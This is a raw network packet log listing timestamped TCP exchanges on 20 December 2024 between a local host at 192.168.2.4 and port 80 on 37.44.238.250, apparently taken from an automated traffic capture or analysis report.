                                                                                                                      Dec 20, 2024 21:17:37.863684893 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:37.920780897 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.983331919 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.983374119 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:37.988739014 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.417773008 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.488708973 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.644603968 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.645658016 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.652527094 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.765424013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.785497904 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.827769995 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.926901102 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:38.947597027 CET804974337.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:38.947665930 CET4974380192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.004477978 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.047538042 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.047616959 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.047769070 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.052202940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.124537945 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.124645948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.167699099 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.177151918 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.394994020 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.486443043 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.498042107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.514818907 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.514828920 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.514852047 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.617672920 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.848104000 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:39.904859066 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.968441963 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.968501091 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:39.988620996 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:40.342910051 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:40.488578081 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:40.576973915 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:40.633101940 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:40.669040918 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:40.691704035 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:40.788590908 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.020116091 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.076971054 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.092597961 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.127072096 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.139745951 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.139775038 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.192981958 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.212426901 CET804974437.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.212485075 CET4974480192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.246644974 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.246716976 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.246859074 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.366765976 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.598135948 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.717714071 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.717753887 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.717771053 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.797334909 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:41.801605940 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:41.921329975 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.160569906 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:42.211211920 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.280575991 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.280591965 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.285480022 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:42.523643017 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.566724062 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:42.756613970 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.936233044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:42.942213058 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:42.951473951 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:42.952533007 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.061820984 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.072388887 CET804974537.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.072403908 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.072458982 CET4974580192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.072541952 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.072679996 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.192121029 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.301187992 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.349756956 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.420808077 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.420927048 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.426184893 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.488575935 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:43.545780897 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.545835018 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:43.545850039 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.070842981 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.071722984 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:44.191245079 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.355140924 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.426170111 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:44.478060007 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.488594055 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:44.546153069 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.546199083 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.588921070 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:44.691703081 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:44.691731930 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:44.956119061 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:44.957171917 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.076015949 CET804974737.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.076067924 CET4974780192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.076705933 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.076792955 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.077178955 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.194128990 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.195405006 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.196636915 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.315032005 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.426261902 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.545960903 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.545980930 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.545995951 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.551173925 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:45.611955881 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.671065092 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.671082973 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:45.691705942 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.320272923 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.321068048 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.349710941 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.440836906 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.488599062 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.589010954 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.676095009 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.676217079 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.728540897 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.759968042 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.760844946 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.785465002 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.795878887 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.795890093 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.879844904 CET804974937.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.879904032 CET4974980192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.880301952 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:46.880362988 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.880517006 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:46.999959946 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.238770008 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:47.358427048 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.358459949 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.358474016 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.447422028 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.448950052 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:47.568465948 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.801196098 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:47.855350018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.910450935 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:47.920866013 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:47.920957088 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.172075987 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.222963095 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.404563904 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.457334042 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.576075077 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.577006102 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.599931955 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.614167929 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.696540117 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.696643114 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.701215982 CET804975037.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.701858997 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.701894045 CET4975080192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:48.733737946 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.821316004 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:48.973227024 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:49.020700932 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.051306963 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:49.066814899 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:49.092860937 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.092966080 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.171032906 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.171056032 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.171065092 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.740283012 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.740638018 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:49.860179901 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:49.978621006 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.019848108 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.098507881 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.148314953 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.191752911 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.212682009 CET804975137.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218193054 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218221903 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218311071 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218316078 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218321085 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218385935 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218389034 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218394995 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218427896 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218440056 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218449116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218503952 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218739033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218749046 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218755960 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218765974 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218779087 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218790054 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218792915 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218825102 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218839884 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218853951 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218862057 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.218936920 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.218965054 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219016075 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219080925 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219090939 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219099045 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219139099 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219156981 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219171047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219192028 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219221115 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219252110 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219280005 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219289064 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219345093 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219382048 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219391108 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219440937 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219446898 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219475031 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219495058 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219518900 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219552040 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219561100 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219609022 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219609976 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219619989 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219672918 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219707012 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219716072 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219722986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219763041 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219777107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219840050 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219856024 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219865084 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219893932 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219923973 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.219959974 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.219969034 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220015049 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220055103 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220065117 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220077991 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220088005 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220104933 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220105886 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220134020 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220163107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220166922 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220175982 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220185041 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.220221043 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.220233917 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.254247904 CET4975180192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.337928057 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.337991953 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338006020 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338046074 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338186026 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338195086 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338253975 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338289022 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338298082 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338339090 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338613033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338622093 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338665962 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.338742018 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338751078 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.338797092 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339009047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339018106 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339063883 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339174986 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339229107 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339293003 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339302063 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339306116 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339349031 CET4973280192.168.2.437.44.238.250
                                                                                                                      Dec 20, 2024 21:17:50.339554071 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339562893 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339572906 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339617968 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339627028 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339696884 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339705944 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339802027 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339835882 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339879036 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339888096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339939117 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.339946985 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340084076 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340094090 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340183973 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340193033 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340203047 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340270042 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340306044 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340316057 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340425968 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340435028 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340442896 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340451002 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340485096 CET804973237.44.238.250192.168.2.4
                                                                                                                      Dec 20, 2024 21:17:50.340639114 CET804973237.44.238.250192.168.2.4
